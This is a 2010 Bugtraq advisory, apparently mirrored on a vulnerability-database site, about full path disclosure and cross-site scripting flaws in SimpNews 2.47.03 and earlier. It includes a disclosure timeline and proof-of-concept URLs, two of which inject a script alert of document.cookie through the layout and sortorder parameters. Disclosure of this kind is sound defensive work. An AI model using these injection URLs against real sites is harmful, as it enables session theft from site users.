Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24203
HistoryJul 11, 2010 - 12:00 a.m.

Vulnerabilities in SimpNews

2010-07-1100:00:00
vulners.com
6
JSON

Hello Bugtraq!

I want to warn you about security vulnerabilities in SimpNews.

Advisory: Vulnerabilities in SimpNews

URL: http://websecurity.com.ua/4245/

Affected products: SimpNews V2.47.03 and previous versions.

Timeline:

26.10.2009 - found vulnerabilities.
29.05.2010 - announced at my site.
30.05.2010 - informed developer.
31.05.2010 - developer released SimpNews v2.48. In version 2.48 the
developer fixed all mentioned vulnerabilities.
09.07.2010 - disclosed at my site.

Details:

These are Full path disclosure and Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/simpnews/news.php?lang=1&layout=layout2&sortorder=0&category=1

XSS:

http://site/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON